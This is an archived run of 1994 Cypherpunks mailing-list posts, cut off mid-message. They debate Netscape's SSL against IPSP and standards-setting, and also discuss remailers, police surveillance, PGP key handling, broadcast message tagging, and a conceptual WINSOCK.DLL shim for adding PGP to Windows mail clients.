Human intervention is necessary each time someone begins to trust a remailer. That intervention can be for one's own use or for someone else's, but automatically trusting new remailers is Not Good. The question then becomes "what is the structure of human intervention required to change the trust in a remailer?". Use of agency will be desirable, certainly. These questions of human relations need to be examined before technical means of communication can be profitably pinned down. Eric From marca at neon.mcom.com Mon Dec 12 19:01:50 1994 From: marca at neon.mcom.com (Marc Andreessen) Date: Mon, 12 Dec 94 19:01:50 PST Subject: BofA+Netscape Message-ID: At 7:50 AM 12/12/94, Perry E. Metzger wrote: >Marc Andreessen says: >> I fully expect we'll be supporting other security standards and >> approaches as they emerge, and we certainly welcome realistic suggestions >> on what we should do, when, and how. > >I told you in Email, Mr. Andreessen, that new transport level security >protocols are useless now that IPSP has come near to standardization >and now that prototype implementations are nearly available. Great, IPSP looks fantastic and we look forward to supporting it as it moves through and beyond the "near" phase. > Many >people at IETF in other groups expressed far less interest in >proceeding with new security protocols now that there will be a >network layer security protocol. However, you did not appear to be >remotely interested. I suppose that you considered the comment I made >"unrealistic". No, I think IPSP is a great idea and I don't think there's any question we'll be supporting it. >unfortunately, the product is >just too pretty looking. Thanks! Cheers, Marc -- Marc Andreessen Netscape Communications Corporation Mountain View, CA marca at mcom.com From tcmay at netcom.com Mon Dec 12 19:05:55 1994 From: tcmay at netcom.com (Timothy C. 
May) Date: Mon, 12 Dec 94 19:05:55 PST Subject: real time surveillances In-Reply-To: <9412130250.AA16328@fsp.fsp.com> Message-ID: <199412130303.TAA03266@netcom17.netcom.com> Paul Ste. Marie wrote: > > > The developers of the localizer technology I mentioned in my > > article have anticipated you. Their equipment can do real-time > > vital sign monitoring. There are some obvious benefits for wired > > cops plus some subtle drawbacks for bad cops. (I leave discovery > > of said drawbacks as an exercise for the student.) > > Heh. You mean, I assume, that such a device would, when worn by an > officer in court, essentially become a broadcast polygraph? It would > also provide an interesting check in wrongful force cases as to > whether a cop really was in fear of his life at a given time. I can't speak for what Sandy S. meant, but I can assure you that a "broadcast polygraph" is not planned, nor is it likely to be technologically feasible any time soon. The basic technology is for position localization, not vital sign reporting, etc. To be sure, a vital signs subsystem could be linked to another system (as could a polygraph, with a lot of effort). But such is not the main intended purpose. --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero 408-688-5409 | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From pstemari at fsp.fsp.com Mon Dec 12 19:19:02 1994 From: pstemari at fsp.fsp.com (Paul Ste. 
Marie) Date: Mon, 12 Dec 94 19:19:02 PST Subject: real time surveillances In-Reply-To: <199412130303.TAA03266@netcom17.netcom.com> Message-ID: <9412130315.AA16603@fsp.fsp.com> > I can't speak for what Sandy S. meant, but I can assure you that a > "broadcast polygraph" is not planned, nor is it likely to be > technologically feasible any time soon. > > The basic technology is for position localization, not vital sign > reporting, etc. To be sure, a vital signs subsystem could be linked to > another system (as could a polygraph, with a lot of effort). But such > is not the main intended purpose. My point was that essentially a (broadcast of vital signs) == (broadcast of polygraph). There's some stuff that's different, but I don't think that it's sufficient to make a real difference. What your friends are currently working on implementing, of course, is not (yet) to this point. Paul From usura at replay.com Mon Dec 12 19:54:23 1994 From: usura at replay.com (Alex de Joode) Date: Mon, 12 Dec 94 19:54:23 PST Subject: uSuRa anonymous remailer [update] Message-ID: <199412130355.AA18327@xs1.xs4all.nl> I have registered the domain-name replay.COM at InterNic. XS4all has installed some sort of MX-handling for my account, usura at xs4all.nl, so my new address will be usura at replay.com. The remailer that is operated from that account is now also reachable at the replay.com address. The usura at xs4all.nl remains valid. Raph Levien has updated the address in his automated pinger; here is the updated PGP key for the usura at replay.COM remailer:
EnJoY. -- Exit! Stage Left. Alex de Joode From snyderra at dunx1.ocs.drexel.edu Mon Dec 12 19:56:53 1994 From: snyderra at dunx1.ocs.drexel.edu (Bob Snyder) Date: Mon, 12 Dec 94 19:56:53 PST Subject: THROUGH THE LOOKING GLASS Message-ID: -----BEGIN PGP SIGNED MESSAGE----- At 9:13 PM 12/12/94, Sandy Sandfort wrote: >My proposal is not anti-cop; it's anti- *bad* cop. Good cops >*benefit* from protective surveillance; and *all* cops benefit >from having their exact location known when the feces impacts the >turbine. sed -e "s/cop/citizen/g" sed -e "s/cop/employee/g" sed... Bob [For the sed-impaired: s - search and replace string 1 with string 2. g - do it multiple times per line.] -----BEGIN PGP SIGNATURE----- Version: 2.6 iQCVAwUBLu0bQeS0CjsjWS0VAQEmzAP+OV59f7hR8CKi6UC13k2x/Fj1QylXPSaj /nR614LzoCeHf7+OAVLN6COx5vGC6yL3EoDL1Ocjm52bWh1nxoIfsGImRBuqRo9R Mcwa6Av+/kn9271O6I6VKLnFU6SYA35vuOAACOAVB647aQ6dAOfheU2fLAd0xEEZ l9mpaNalm7E= =HXZ/ -----END PGP SIGNATURE----- -- Bob Snyder N2KGO MIME, PGP, RIPEM mail accepted snyderra at post.drexel.edu PGP & RIPEM keys on key servers When cryptography is outlawed, bayl bhgynjf jvyy unir cevinpl. From andrew at riskdev.ml.com Mon Dec 12 20:01:15 1994 From: andrew at riskdev.ml.com (Andrew Brown) Date: Mon, 12 Dec 94 20:01:15 PST Subject: extra dashes in PGP-related blocks? 
In-Reply-To: <9412130127.AA17596@hodge-podge.MIT.EDU> Message-ID: <9412130354.AA08518@nottingham.riskdev.ml.com> -----BEGIN PGP SIGNED MESSAGE----- > From: Derek Atkins >> but wait! you can't actually verify the outer sig until you extract >> the key from inside the signed message? that's a bit more >> complicated. pgp will actually recognize a key embedded inside an >> armored, signed message but it won't (i don't think -- warlord?) play >> with the key other than tell you it is one. > >Actually, PGP won't even do that. If the key is not in your keyring, >it will complain about not finding it and output the de-armored >message. If you want to add the key, you need to run it through PGP >once to de-armor it, save off the output, and then add that output >message to your keyring. yep, you're right (like i'm surprised or something, judging from your handle) pgp won't recognize it if you don't have it on your keyring. i do work from a sun and play at home on a linux system. i have too many keys at home to make my play testing easy and i got caught in that trap. it's just too easy to add a login and start playing with pgp in a simulated multi-user environment that doesn't have the pitfalls of the real world. 
- -- - --< "CYBERBOY" >-- andrew at ml.com (Andrew Brown) Phone: 1.212.449.0088 Fax: 1.212.449.8612 genetic Soviet fissionable plutonium DES Kennedy nuclear terrorist Waco, Texas NSA Qaddafi Marxist FSF ammunition South Africa -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLu0aY7AuBPCxVEQ9AQF7mwP9GY+DQtdjPLrF6XS+yJIXXhCaZELt1cDl HHscvAeJL1SQplYcrmCtE5N2QLPVtQh5Dty/6qjYZ21fs4nA5CrK+6Z0Mxfxqc4V eSKk1OVvtT6HjcNx7cFzNjrF0C8eWcnpd256Zgdjfn6DhSY4Jal9X+w4MZiSvCQS MRYy6GvfQho= =xCcd -----END PGP SIGNATURE----- From wcs at anchor.ho.att.com Mon Dec 12 20:04:52 1994 From: wcs at anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204) Date: Mon, 12 Dec 94 20:04:52 PST Subject: Broadcasts - addressing Message-ID: <9412122353.AA08749@anchor.ho.att.com> > I have been contemplating how to mark broadcast messages as being > 'for' someone. To foil traffic analysis, you don't want to include > their nym or key-id, for the sake of the your poor CPU, you want to > avoid the need to attempt decryption on everything that passes through. The main problem is how to avoid decrypting _most_ of the traffic, without giving away significant information about the recipient. One approach is to do something some political users have been asking for - implement support for very short keyids (e.g. 4 bits instead of 24-32), so that the keyid isn't a good identifier for the user. Another approach is to include a tag in the Subject: with either a hash of the key (substantially reducing the number of bits), or simply the last hex or two of the keyid - that lets you ignore 15/16th or 255/256th of the traffic, without giving away much. From amanda at intercon.com Mon Dec 12 20:20:05 1994 From: amanda at intercon.com (Amanda Walker) Date: Mon, 12 Dec 94 20:20:05 PST Subject: Photuris Message-ID: <199412130419.XAA07016@intercon.com> > Ah, the hazards of not going to IETF... Good thing the proceedings get publicized in electronic format, eh? 
:) --Amanda From jamesd at netcom.com Mon Dec 12 20:28:37 1994 From: jamesd at netcom.com (James A. Donald) Date: Mon, 12 Dec 94 20:28:37 PST Subject: BofA+Netscape In-Reply-To: <199412130347.TAA00969@largo.remailer.net> Message-ID: <199412130420.UAA25217@netcom4.netcom.com> Eric Hughes flames away without first reading: Eric, read more, flame less, you might learn something. > > How many times will there remain the confusion between what is > achievably optimal and what is permitted? > > From: jamesd at netcom.com (James A. Donald) > > Now plainly they should listen very carefully to what the guys > at CERN say about SGML tags, but as far as I can see, the groups that > you want them to take consensus with, have no standing in this matter. > > This is all very Libertarianly Correct, certainly, but it may also be > downright stupid. In future Eric, please read before flaming. I posted a lengthy explanation of why it was counter productive to take consensus with those who are lagging. Here follows the material, that you apparently deleted without reading: ------------ Open standards are great, but a camel is a horse designed by a committee. CERN came down from the mountain top, and decreed what HTML and HTTP should be, and that was a truly open and successful standard. Very few such standards have emerged from committees. If anything Netscape is paying too much attention to official committees and too little attention to reality. (for example their irrelevant ID protocol for secure transfer.) and if Netscape descends from the mountain and proclaims a superset of HTML and additional HTTP behavior, then provided that they are open and retain backward compatibility, that is the way to go. If their proclamation is flawed, they will not get away with it. If their proclamation is OK, being developed from practice instead of bureaucratic politicking, then they will get away with it. For example consider the standards committee on SQL. 
It is just a political issue: What companies on the standards committee decide to do is deemed good, what others do is deemed bad. As a result the SQL "standard" is now just a random pile that does not make any sense. This is OK when the standards committee is dominated by those on the leading edge of technology, but irrelevant and harmful when they are lagging. A few years back, when the standards for new RAM chips were debated, those who were lagging decreed that any ram chip beyond their technology to make was deemed to be non standard. Needless to say, today we all use non standard RAM chips, which were belatedly defined to be standard. A similar thing occurred with the move to higher floppy disk densities. Those who could not double, decreed the next density increase would not be to double the previous density. Again, the floppy standard was non standard until the standards people reluctantly and belatedly accepted reality. In short, when the leading edge company dominates the standards committee, it is of little use, and when the old companies dominate the standards committee, it is actually harmful. -- --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at netcom.com From jamesd at netcom.com Mon Dec 12 20:36:41 1994 From: jamesd at netcom.com (James A. Donald) Date: Mon, 12 Dec 94 20:36:41 PST Subject: Clarification of my remarks about Netscape In-Reply-To: <9412130208.AA11526@snark.imsi.com> Message-ID: <199412130436.UAA26914@netcom4.netcom.com> Perry E. Metzger writes > As it stands [netscape] come off looking > like ignorant blunderers. Perry, you are wrong. Now Netscape have done a lot of silly stuff. 
It is painfully obvious that they developed Netscape for windows without using debug windows, and as a result Netscape crashes my system continuously. But reality is that they have produced by far the coolest browser there is, and they are bringing crypto to the masses, and you, and Eric Hughes, and most of us, have not yet brought crypto to the masses. Give them credit for doing what we have talked of doing, but have not actually done. Sure, if you had done it, the crypto would be better. If I had done it, it would not crash all the time and its caching algorithm would be way superior. But I did not do it and you did not do it. They did it. Perhaps they will fix the crashing in version 1.1, and the crypto and the caching in version 1.2 -- --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at netcom.com From jamesd at netcom.com Mon Dec 12 20:55:58 1994 From: jamesd at netcom.com (James A. Donald) Date: Mon, 12 Dec 94 20:55:58 PST Subject: A Golden Opportunity In-Reply-To: <199412130143.RAA11607@netcom4.netcom.com> Message-ID: <199412130455.UAA29013@netcom4.netcom.com> Timothy C. May writes > In recent days we have seen on our own list comments from folks from > Netscape--surely a major player in whatever's coming--and from > attendees at the recent IETF meeting (that stuff is Acronym City to > me, so I stay out of the debate). And contributions from Phil > Zimmermann, Bruce Schneier, Steven Levy, and the like. > > > "Can't we all just get along?" is a much-laughed-at slogan, but it > seems to apply here. We have a golden opportunity to influence the > Net of the future, surely a good thing. (And I haven't even mentioned > the Cypherpunks connections to digital cash of various flavors.) 
It seems that Perry and others are flaming Netscape for doing things their own way.

Yes, Netscape have made a lot of fuckups. But they are out there bringing really cool crypto to the masses.

First guy on the block always does a lot of dumb fuckups. That is what version 2.0 is for.

Yes, and all the blunders that appear in version 0.99 are really gross incredibly stupid blunders. We should know. Our prerelease versions of everything we have created have always been full of incredibly stupid blunders. That is the nature of programming.

Let he who is without sin cast the first stone.

--
---------------------------------------------------------------------
We have the right to defend ourselves and our property, because of the kind of animals that we are. True law derives from this right, not from the arbitrary power of the omnipotent state.
James A. Donald
jamesd at netcom.com

From eric at remailer.net Mon Dec 12 20:59:35 1994
From: eric at remailer.net (Eric Hughes)
Date: Mon, 12 Dec 94 20:59:35 PST
Subject: BofA+Netscape
In-Reply-To: <199412130420.UAA25217@netcom4.netcom.com>
Message-ID: <199412130557.VAA01204@largo.remailer.net>

   From: jamesd at netcom.com (James A. Donald)

   Eric, read more, flame less, you might learn something.

Ah, I see. Disagreement equals flaming.

   I posted a lengthy explanation of why it was counter productive
   to take consensus with those who are lagging.

And since they were _your_ ideas, they were correct. You did not reply to the substance of my own comments. I now must hypothesize that you didn't understand them. I am at least polite enough to refrain from implying that you didn't read them.

   A few years back, when the standards for new RAM chips
   were debated

The analogy between physical manufactures and compatible software is inaccurate. I implied that in my post, but I take it you didn't follow my conclusion very far.
   In short, when the leading edge company dominates the
   standards committee, it is of little use, and when the old
   companies dominate the standards committee, it is actually
   harmful.

The domain of applicability of this situation is not universal. There is good reason to believe that it does not apply here.

Eric

From jamesd at netcom.com Mon Dec 12 21:09:06 1994
From: jamesd at netcom.com (James A. Donald)
Date: Mon, 12 Dec 94 21:09:06 PST
Subject: Clarification of my remarks about Netscape
In-Reply-To: <9412121737.ZM17867@warp.mcom.com>
Message-ID: <199412130506.VAA00184@netcom4.netcom.com>

Someone who has never produced a really cool piece of software that brings crypto to the masses wrote:
> > But no, you [Netscape] blindly forge ahead, so full of yourself that you
> > blissfully reinvent wheels (Perry), miss the real concerns of
> > the users (Me), disrupt the marketplace (Amanda), and generally
> > fail to think things through very well (Adam) or consider the work
> > of others (Perry).
> >
> > Your three biggest problems are: arrogance, arrogance and
> > arrogance.

Kipp E.B. Hickman writes
>
> [Netscape's] intention is to support any development effort attempting
> to implement an SSL conformant implementation. We will work with
> you to repair the spec as needed to eliminate any errors or
> omissions, and help you test your implementation to ensure that
> it interoperates with ours.

Guys, this is the greatest news.

How come the cypherpunks list is not singing and dancing and saying how great this is, instead of whining and bitching because Netscape is not all the way there yet.

--
---------------------------------------------------------------------
We have the right to defend ourselves and our property, because of the kind of animals that we are. True law derives from this right, not from the arbitrary power of the omnipotent state.
James A. Donald
jamesd at netcom.com

From jamesd at netcom.com Mon Dec 12 21:23:47 1994
From: jamesd at netcom.com (James A. Donald)
Date: Mon, 12 Dec 94 21:23:47 PST
Subject: BofA+Netscape
In-Reply-To: <199412130557.VAA01204@largo.remailer.net>
Message-ID: <199412130523.VAA01839@netcom4.netcom.com>

> I wrote:
> Eric, read more, flame less, you might learn something.
> Eric Hughes writes
> [...] You did not
> reply to the substance of my own comments.

Because they did not have any substance.

You claimed I was arguing from libertarian correctness.

This was not the case, as you now implicitly acknowledge by belatedly addressing the argument I did make instead of the argument that you alleged I made.

Since you earlier criticized the argument that you thought I made, instead of the argument that I did make, a reasonable conclusion is that you did not read it before opening fire.

The short of your argument is that Netscape will fragment the net by running out there and dumping something in the market place without consensing with all the big boys.

Bunkum: Look at the RS232 standard. Remember how we were always futzing around trying to make one company's RS232 talk to another company's RS232. Similarly the SCSI-1 standard.

The best way to make standards that stick is for the front runner to proclaim them from the mountain by fiat.

If apple and IBM and microsoft got together and agreed on a standard:

1. We would all be old and grey.
2. They still would not interoperate.
3. Netscape would not be out there doing really cool stuff and promising to bring crypto to the masses.

--
---------------------------------------------------------------------
We have the right to defend ourselves and our property, because of the kind of animals that we are. True law derives from this right, not from the arbitrary power of the omnipotent state.
James A. Donald
jamesd at netcom.com

From nobody at jpunix.com Mon Dec 12 21:32:39 1994
From: nobody at jpunix.com (Anonymous)
Date: Mon, 12 Dec 94 21:32:39 PST
Subject: Crypto Declaration of Independence
Message-ID: <199412130530.XAA13788@jpunix.com>

-----BEGIN PGP SIGNED MESSAGE-----

James A. Donald wrote:
>Anonymous writes
>> I have a proposal for you all.
>>
>> I have started work on a Crypto Declaration of Independence, based on the
>> famous American work which represents Independence.
>
>This is unwise and unnecessary.
>
>It is unwise because we do not wish to alert the government
>to the fact that the net is largely ungoverned and ungovernable.

I do not think it is unwise because we do want to state a position for ourselves. We need to let everyone, including the government, know that we will not stand for crypto-policy which is not in our best interest. No matter what comes, we will continue to use PGP, SHTTP, link-encryption and every method which we have determined to be in our best interest, not what we must have faith in what we are told is in our best interest.

>It is unnecessary because crypto is already covered by various
>existing declarations on rights.
>
>
>
>THE BILL OF RIGHTS

This is bullshit, and you know it as well as I do. A steady stream of misinformation has misled government officials into 'ignoring' these rights when dealing with electronic documents, and encryption specifically. When the administration has something which might be unfavorable in the public eye (ie, Clipper), they quickly try to pass it through, ignoring public cries in the process. How many letters did it take before there were any open hearings about the EES, and then the words of respected professionals were seemingly ignored as the policy was pushed ahead.

This was not thought to be an extremist attempt at breaking off from our current government. It's also not supposed to be a confrontational attack.
It was intended to be a strong statement, letting all know what we believe in and why we do. We need to declare our independence from being governed by policy which encroaches on our rights, rights which this country was founded in, and rights which are being ignored.

Asynchronous

From db at Tadpole.COM Mon Dec 12 21:41:15 1994
From: db at Tadpole.COM (Doug Barnes)
Date: Mon, 12 Dec 94 21:41:15 PST
Subject: Broadcasts - addressing
In-Reply-To: <9412122353.AA08749@anchor.ho.att.com>
Message-ID: <9412130540.AA13901@tadpole.tadpole.com>

Bill --

I think this is an interesting approach. I think there is a degree of linkability that is hard to shake, especially in the early, low bandwidth days (and in the later, high-bandwidth days, the CPU will get exercised in proportion to the extent the messages are unlinkable.)

My thoughts on this continue to be in favor of distributing random number "tokens" to your correspondents; your sniffer has all your unused but issued tokens and scans for them. I do like your approach for "initial contact", but the keyid size would need to be finely tuned. It is also not clear if you want the sender to be able to set the keyid size, as this gives them the ability to create more work for you.

The downside to my approach is that it would require some support from remailers and in the sniffers (has anyone written such a beast yet?), and a small, very simple program for generating packets of the tokens, accepting them, using them, and exporting them to the sniffer.

Your approach could probably be implemented by the last remailer prior to news posting and a change to PGP.
Frankly, I would like to see a PGP encryption option that had no visible key id and decrypted based on a decryption key id specified on the command line. (But this has been suggested many times.)

All grist for the mill...

>
> > I have been contemplating how to mark broadcast messages as being
> > 'for' someone. To foil traffic analysis, you don't want to include
> > their nym or key-id, for the sake of your poor CPU, you want to
> > avoid the need to attempt decryption on everything that passes through.
>
> The main problem is how to avoid decrypting _most_ of the traffic,
> without giving away significant information about the recipient.
> One approach is to do something some political users have been asking for -
> implement support for very short keyids (e.g. 4 bits instead of 24-32),
> so that the keyid isn't a good identifier for the user.
> Another approach is to include a tag in the Subject: with either a hash
> of the key (substantially reducing the number of bits),
> or simply the last hex or two of the keyid - that lets you ignore
> 15/16th or 255/256th of the traffic, without giving away much.
>

From eric at remailer.net Mon Dec 12 21:43:10 1994
From: eric at remailer.net (Eric Hughes)
Date: Mon, 12 Dec 94 21:43:10 PST
Subject: BofA+Netscape
In-Reply-To: <199412130523.VAA01839@netcom4.netcom.com>
Message-ID: <199412130641.WAA01309@largo.remailer.net>

   From: jamesd at netcom.com (James A. Donald)

   Because they did not have any substance. You claimed I was
   arguing from libertarian correctness.

Perhaps you don't know the meaning of whitespace and paragraph breaks.

I did claim you were arguing from libertarian correctness. Now that's just an insult, which I do not retract. In a second paragraph, I began a new argument which did not depend on your subjective state of mind. I currently think that you just got a weensy little inflamed and didn't bother to try to understand the argument, projecting that the remainder must be similar.
   This was not the case, as you now implicitly acknowledge by
   belatedly addressing the argument I did make instead of the
   argument that you alleged I made.

Oh, please. Go back and read what I originally wrote. Perhaps I overestimate your ability to ascertain relevance, though.

   The short of your argument is that Netscape will fragment the
   net by running out there and dumping something in the market
   place without consensing with all the big boys.

This is not an argument. This is a premise.

I suggest you go back and try to summarize what I actually said. (Hint: it has to do with game theory.)

Eric

From shamrock at netcom.com Mon Dec 12 21:49:18 1994
From: shamrock at netcom.com (Lucky Green)
Date: Mon, 12 Dec 94 21:49:18 PST
Subject: Real-time surveillance of the police
Message-ID:

Tim wrote:
>(The longer-than-I'd-planned section above is meant to show that even
>a cop-disliking skeptic like me can be convinced that some good is
>done by them, and that not all cops are bad. Perhaps my on-day
>exposure co-opted me the way certain folks in D.C. got co-opted?)

Yup!

-- Lucky Green
   PGP encrypted mail preferred.

From jcorgan at netcom.com Mon Dec 12 21:54:27 1994
From: jcorgan at netcom.com (Johnathan Corgan)
Date: Mon, 12 Dec 94 21:54:27 PST
Subject: Winsock & PGP Integration
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

It has been a long discussed and desired feature for MS-Windows users to be able to integrate PGP functionality into the various Windows Sockets based mail and news readers. After a discussion with Raph and Pierre at the cypherpunks meeting this weekend, I took a look at the paradigm that premail uses and gave some thought to how this same concept could be applied in the Windows environment.

On a Un*x machine, premail works by impersonating the mail transfer agent and intercepting the flow of mail in each direction, adding encryption, signing, and anonymous remail services in a rather elegant fashion.
As the mail system under Un*x (indeed, the entire OS) is designed to be a "piped and glued together" batch of smaller utilities, premail's method works well and is very 'unix-like'.

How to achieve the same under Windows with winsock based SLIP or PPP access? The various mail agents such as Eudora and Chameleon are integrated packages that do everything from using SMTP and POP for mail transfer to providing the user agent that reads and writes mail. There really is no simple way to wedge into the package and replace or supplement functionality.

Except one. What all of these agents have in common is that they interface with the Windows Sockets API to establish TCP streams that are used in the POP and SMTP protocols. Since these are well known and standardized protocols, this gives us our toehold.

Picture this. Using a replacement WINSOCK.DLL, we can intercept those specific API calls that an application would use to open the appropriate sockets and establish a TCP stream to a particular remote socket. For all other API calls, we hand these off to the "real" WINSOCK.DLL (that we have renamed and loaded after our DLL has loaded).

Our replacement DLL now has the ability to make the mail application think it is talking to a remote SMTP or POP process, when in fact, it is talking to our agent on the local machine. Our local agent spoofs the SMTP protocol, accepts the mail, does all the neat crypto stuff, and stores the mail in an outbound queue. At whatever preprogrammed intervals, _our_ agent makes the _real_ SMTP call to the remote and delivers the mail.

The reverse process would work as well. Our local agent periodically makes a POP call to the remote end, retrieves mail, and stores it in an inbound queue. Again, we do all the neat crypto stuff, and finally the next time Eudora or whatever mail agent is in use makes its POP run, we spoof POP and deliver the mail to the mail program.

A little thought on this and I realized that this could be a generalized process.
Want to implement an anonymous remailer under Windows? Use this mechanism and replace "neat crypto stuff" with "even neater anonymous remailing stuff." Majordomo for Windows? No problem, same method. By intercepting the flow of mail in each direction, there is no limit to the stuff you could come up with.

Why bother fiddling with Windows anyway, when one has all the beauty and power of Un*x at one's disposal (such as Linux)? Well, think about where the personal computing sector is going to grow in about six months or so with the advent of Windows95. Okay, it's a great OS for what it is designed for, but it doesn't have pipes or perl or twenty or thirty command line parameters for every executable. So what. I guarantee that there will be more laptops and desktop PC's with Windows95 than with any flavor of Un*x. If we are to promote and encourage, as well as make the tools for, the use of strong crypto by the average Joe, then Windows is where it is at.

I've just enough Windows programming experience to know that the scheme I worked out above is feasible and would work well. On the other hand, I have no experience with Windows Sockets at the api level, nor with any implementation of SMTP or POP (though I know the protocols themselves well.)

Yep. It would be cool to write a message in Chameleon (such as this one), press the send button, and have a dialog box pop up asking me if I wanted to sign, encrypt, or remail this message. Or to have it done automatically for me. And this would work with existing mailers today.

Sheesh, somebody burst my bubble.
Comments, criticisms, suggestions, and especially financial donations, are quite welcome :)

=======================================================================
Johnathan Corgan       "Violence is the last refuge of the incompetent"
jcorgan at netcom.com                                     -Isaac Asimov
PGP Public Key: http://www-swiss.ai.mit.edu/~bal/pks-toplev.html
Or send email to: pgp-public-keys at pgp.ai.mit.edu Subj: GET jcorgan
=======================================================================

From jg at islay.mcom.com Mon Dec 12 21:55:13 1994
From: jg at islay.mcom.com (John Giannandrea)
Date: Mon, 12 Dec 94 21:55:13 PST
Subject: IPSP and Netscape
Message-ID: <199412130551.VAA10080@islay.mcom.com>

Eric Hughes writes:
> It may be that IPSP is not the quickest or best way to link security, but
> that is not the point I am making here. The original denial of IPSP's
> potential utility was made in complete ignorance

Widespread acceptance of IPSP may well make SSL irrelevant. I do not believe that anyone at Netscape is claiming otherwise.

Nonetheless, widespread implementation of IPSP simply does not exist at this time. We need a solution for our customers _today_.

SSL is one working solution to the problem of link security. By publishing our specification of SSL we are inviting others to share in our work, or criticize us for being foolish.

I do not believe that we are either arrogant or ignorant in creating SSL. The market will, of course, help decide.

-jg

From jamesd at netcom.com Mon Dec 12 22:09:07 1994
From: jamesd at netcom.com (James A. Donald)
Date: Mon, 12 Dec 94 22:09:07 PST
Subject: Clarification of my remarks about Netscape
In-Reply-To: <9412121811.AA55359@amanda.dial.intercon.com>
Message-ID: <199412130608.WAA07586@netcom4.netcom.com>

Amanda Walker criticizes SSL because it is irrelevant to the threat that people are likely to be concerned about.

> SSL is a mechanism whereby a client and a server can establish a secure,
> authenticated transport channel. The problem is that this isn't what I want
> to secure and authenticate. [...]
> I want the *documents* I'm accessing to be secure and/or
> authenticated. I want my HTML documents signed and certified by the *author*,
> not the server. I couldn't care less about the server if I can verify that
> I've got the right document in response to my query. Similarly, if I send the
> contents of a form containing, say, my Amex number, I want to encrypt the
> session key with the public key of the merchant, not the service provider.
>
> This is what I (and many others) mean by an "end to end security model."

This seems a very relevant criticism:

Has Amanda, or anyone else proposed an extension to HTML that would incorporate such things?

for example: Encrypted and possibly signed material. (with any special html characters, such as '<' and '>', being escaped in the ascii armored bitstreams.)

Or did the standards groups that Netscape has been ignoring not bother to discuss such matters?

--
---------------------------------------------------------------------
We have the right to defend ourselves and our property, because of the kind of animals that we are. True law derives from this right, not from the arbitrary power of the omnipotent state.
James A. Donald
jamesd at netcom.com

From dfloyd at io.com Mon Dec 12 22:21:25 1994
From: dfloyd at io.com (dfloyd at io.com)
Date: Mon, 12 Dec 94 22:21:25 PST
Subject: What, exactly is elliptic encryption?
Message-ID: <199412130621.AAA07346@pentagon.io.com>

What, exactly is elliptic curve encryption?
(Only thing I knew that the NeXT nearly had it in its OS, but the heavy hammer of ITAR squashed that...)

From db at Tadpole.COM Mon Dec 12 22:29:06 1994
From: db at Tadpole.COM (Doug Barnes)
Date: Mon, 12 Dec 94 22:29:06 PST
Subject: BofA+Netscape
In-Reply-To: <199412130523.VAA01839@netcom4.netcom.com>
Message-ID: <9412130628.AA14196@tadpole.tadpole.com>

James --

You seem to be reacting to a number of deliberate hot-button items in the projected mythos of Netscape.

1) Do you really think that Internet standards are set by "the big boys?" Get a grip. Windows _still_ doesn't include a TCP/IP stack, which must be grafted on with some pain. Apple has done a better job, but only recently started shipping machines with it.

2) Internet standards are set by the participants in the internet. They move much more quickly than any other standards body I've had the (mis)fortune of dealing with, the standards are open and freely available, and free reference implementations are required. I cannot think of a more favorable set of circumstances for the "little guy."

3) NCOM, by not merely circumventing but COMPLETELY IGNORING the Internet standards setting process and adjunct development of reference implementations, has set forth to reinvent the wheel, and badly at that.

4) This is completely incidental to the way they have soiled the community nest for WWW development, which contains not only the "big boys", who can probably take this sort of thing on the chin without blinking, but also a horde of other "little guys," many of whom are even smaller than NCOM.

Doug
[ who has never worked on anything "for the masses", unless the users of AIX or Non-Stop UX are "the masses" ]

From jamesd at netcom.com Mon Dec 12 22:53:05 1994
From: jamesd at netcom.com (James A. Donald)
Date: Mon, 12 Dec 94 22:53:05 PST
Subject: BofA+Netscape
In-Reply-To: <199412130641.WAA01309@largo.remailer.net>
Message-ID: <199412130652.WAA12984@netcom4.netcom.com>

From: jamesd at netcom.com (James A. Donald)
> > You claimed I was
> > arguing from libertarian correctness.

Eric Hughes replies:
> Perhaps you don't know the meaning of whitespace and paragraph breaks.

And then he contradicts himself:
> I did claim you were arguing from libertarian correctness. Now that's
> just an insult, which I do not retract.
>
> [...]
>
> Oh, please. Go back and read what I originally wrote. Perhaps I
> overestimate your ability to ascertain relevance, though.

You do not demonstrate much ability to think rationally in this posting. A self contradiction in three lines, above, and some interesting logic to follow:

I wrote:
> > The short of your argument is that Netscape will fragment the
> > net by running out there and dumping something in the market
> > place without consensing with all the big boys.

you wrote:
> This is not an argument. This is a premise.

I see: So you start off with the assumption that what I was arguing was false, and because that is a premise not an argument, you do not have to defend it or support it.

Nice piece of logic there.

I accused you of flaming before reading. Now you claim that you did read it, but the laws of logic exempt you from having to make rational criticism of what I wrote.

I think your defense denigrates you more than my original accusation did.

Now back to some slight crypto relevance:

Each posting I made was about the standards making process.

I argue that good standards are created by victory in the market place, and bad standards are made by committees and consensus.

You argue game theory that would be valid given your premise that cooperation works in this case. Since the whole point of each of my letters on this thread is that cooperation with lagging competitors does not work in setting standards, game theory is irrelevant to this issue.

Your so called "game theory" is just code for the moral assumption that Netscape are wicked not to engage in consensus.

I do what you pretend to do. I deduce moral truths from game theory.
You instead start off with an unjustified moral assumption, and express that assumption in inappropriate game theoretic language, so that you can cloak your arbitrary prejudices in pretended moral neutrality.

You do not reason using game theory, you use it as a code to express moral claims without having to justify them.

--
---------------------------------------------------------------------
We have the right to defend ourselves and our property, because of the kind of animals that we are. True law derives from this right, not from the arbitrary power of the omnipotent state.
James A. Donald
jamesd at netcom.com

From eric at remailer.net Mon Dec 12 22:58:57 1994
From: eric at remailer.net (Eric Hughes)
Date: Mon, 12 Dec 94 22:58:57 PST
Subject: Winsock & PGP Integration
In-Reply-To:
Message-ID: <199412130756.XAA01455@largo.remailer.net>

   From: Johnathan Corgan

The proposal is to spoof protocols under windows. The idea seems perfectly sensible to me.

   Except one. What all of these agents have in common is that
